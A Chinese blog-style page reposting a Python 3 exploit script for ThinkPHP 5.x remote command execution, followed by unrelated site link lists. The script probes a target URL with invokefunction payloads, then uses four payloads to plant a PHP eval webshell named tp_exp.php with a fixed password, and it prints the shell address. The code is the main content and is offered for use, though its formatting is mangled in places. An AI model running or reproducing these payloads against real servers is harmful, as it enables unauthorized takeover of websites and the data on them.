thinkphp实战教程之博客技术学习(python3编写ThinkPHP命令执行Getshell的方法)
类别:脚本大全 浏览量:723
时间:2022-01-22 01:32:02 thinkphp实战教程之博客技术学习
python3编写ThinkPHP命令执行Getshell的方法加了三个验证漏洞以及四个getshell方法
|
# /usr/bin/env python3 # -*- coding: utf-8 -*- # @author: morker # @email: [email]admin@nsf.me[/email] # @blog: [url]http://nsf.me/[/url] import requests import sys def demo(): print ( ' _______ _ _ _ _____ _ _ _____ ' ) print ( ' |__ __| | (_) | | | __ \| | | | __ \ ' ) print ( ' | | | |__ _ _ __ | | _| |__) | |__| | |__) |' ) print ( ''' | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''' ) print ( ' | | | | | | | | | | <| | | | | | | ' ) print ( ' |_| |_| |_|_|_| |_|_|\_\_| |_| |_|_| ' ) print () print ( '\tthinkphp 5.x (v5.0.23 and v5.1.31 following version).' ) print ( '\tremote command execution exploit.' ) print ( '\tvulnerability verification and getshell.' ) print ( '\ttarget: http://target/public' ) print () class thinkphp(): def __init__( self ,web): self .web = web self .headers = { "user-agent" : "mozilla/5.0 (windows nt 10.0; win64; x64; rv:63.0) gecko/20100101 firefox/63.0" , "accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" , "accept-language" : "zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3,en;q=0.2" , "accept-encoding" : "gzip, deflate" , "content-type" : "application/x-www-form-urlencoded" , "connection" : "keep-alive" } def verification( self ): i = 0 s = 0 verifications = [ '/?s=index/\\think\request/input&filter=phpinfo&data=1' , '/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1' , '/?s=index/\\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1' ] while true: if i = = len (verifications): break else : url = self .web + verifications[i] req = requests.get(url = url,headers = self .headers) if 'phpinfo()' in req.text: s = 1 break else : s = 0 i + = 1 if s = = 1 : print ( "[+] there are vulnerabilities." ) print () toshell = input ( "[*] getshell? (y/n):" ) if toshell = = 'y' : self .getshell() elif toshell = = 'n' : sys.exit() else : sys.exit() else : print ( "[-] there are no vulnerabilities." ) def getshell( self ): getshells = [ '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_post[nicai4]); ?>' , '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_post[nicai4]);%20?>%27%20>>%20tp_exp.php' , '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_post[nicai4]);%20?^>%20>>tp_exp.php' , '?s=index/\\think\\template\driver\\file/write&cachefile=tp_exp.php&content=<?php%20eval($_post[nicai4]);?>' ] shell = self .web + '/tp_exp.php' i = 0 s = 0 while true: if i = = len (getshells): break else : url = self .web + getshells[i] req = requests.get(url = url,headers = self .headers) req_shell = requests.get(url = shell,headers = self .headers) if req_shell.status_code = = 200 : s = 1 break else : s = 0 i + = 1 if s = = 1 : print ( "[+] webshell :%s password :nicai4" % shell) else : print ( "[-] the vulnerability does not exist or exists waf." ) def main(): demo() url = input ( "[*] please input your target: " ) run = thinkphp(url) run.verification() if __name__ = = '__main__' : main() |
注:图中的测试网址为在线漏洞环境,可自己去在线搭建测试。
环境地址:https://www.vsplate.com/
效果图:
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持开心学习网。
原文链接:https://bbs.ichunqiu.com/thread-48729-1-1.html
您可能感兴趣
- thinkphp5.1手动连接mysql数据库(thinkphp5框架结合mysql实现微信登录和自定义分享链接与图文功能示例)
- thinkphp接口开发实例(ThinkPHP5.0框架结合Swoole开发实现WebSocket在线聊天案例详解)
- thinkphp5.1修改(ThinkPHP 5.1 跨域配置方法)
- thinkphp5设计权限(Thinkphp5.0 框架视图view的比较标签用法分析)
- thinkphp5分页数据怎么处理(TP5thinkPHP5框架实现显示错误信息及行号功能的方法)
- thinkphp5.1 执行流程(Thinkphp5.0 框架的请求方式与响应方式分析)
- thinkphp从模板自定义标签(Thinkphp5.0框架视图view的循环标签用法示例)
- think php上传服务器(ThinkPHP5+UEditor图片上传到阿里云对象存储OSS功能示例)
- thinkphp源码上传(ThinkPHP框架实现FTP图片上传功能示例)
- thinkphp5开发小程序后台(PHP小程序支付功能完整版基于thinkPHP)
- thinkphp使用说明(thinkphp框架使用JWTtoken的方法详解)
- thinkphp5.1插件实现(Thinkphp5.0框架使用模型Model的获取器、修改器、软删除数据操作示例)
- thinkphp6.0安装(使用composer安装使用thinkphp6.0框架问题视频教程)
- thinkphp5框架怎么设置(thinkphp5框架调用其它控制器方法 实现自定义跳转界面功能示例)
- thinkphp5单例原理(Thinkphp5框架简单实现钩子Hook行为的方法示例)
- thinkphp5怎么设置默认返回(thinkphp5.1框架实现格式化mysql时间戳为日期的方式小结)
- 开国中将,王牌军63军首任政委,两个连襟一个上将一个少将传为佳话(王牌军63军首任政委)
- 臭名昭著的731部队最高负责人 石井四郎(臭名昭著的731部队最高负责人)
- 王牌部队,你看的剧情我看的时尚(你看的剧情我看的时尚)
- 被鉴定的古董价值300万 当心,你可能遇到诈骗了(被鉴定的古董价值300万)
- 英语难学吗(初中英语难学吗)
- 如何追女孩子(如何追女孩子的技巧和方法)
热门推荐
- docker日志挂载(docker run -v 挂载数据卷异常,容器状态一直是restarting的解决)
- python 时间戳转化为格式(Python datetime和unix时间戳之间相互转换的讲解)
- 云数据库navicat连不上(Navicat Premium15连接云服务器中的数据库问题及遇到坑)
- js实现网页特效(利用原生js模拟直播弹幕滚动效果)
- dede菜单激活状态(DEDE采集大师官方留后门的删除办法)
- sql优化100个技巧(52条SQL语句教你性能优化)
- python怎么在csv修改数据(python 编写输出到csv的操作)
- pythondocx安装教程(Python docx库用法示例分析)
- mysql索引原理及使用(再有人问你MySQL索引原理,就把这篇文章甩给他!)
- python面向对象编写案例(Python面向对象程序设计示例小结)
排行榜
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9